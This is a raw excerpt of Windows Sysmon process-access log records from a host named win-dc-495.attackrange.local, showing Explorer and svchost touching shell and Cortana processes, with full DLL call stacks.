13:58:35.164{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37528|C:\Windows\System32\TwinUI.dll+37448|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+3fb990|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000012035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.164{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37590|C:\Windows\System32\TwinUI.dll+37435|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+3fb990|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000012034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+83c5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b9c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b3b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8749|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ae6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37845308C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
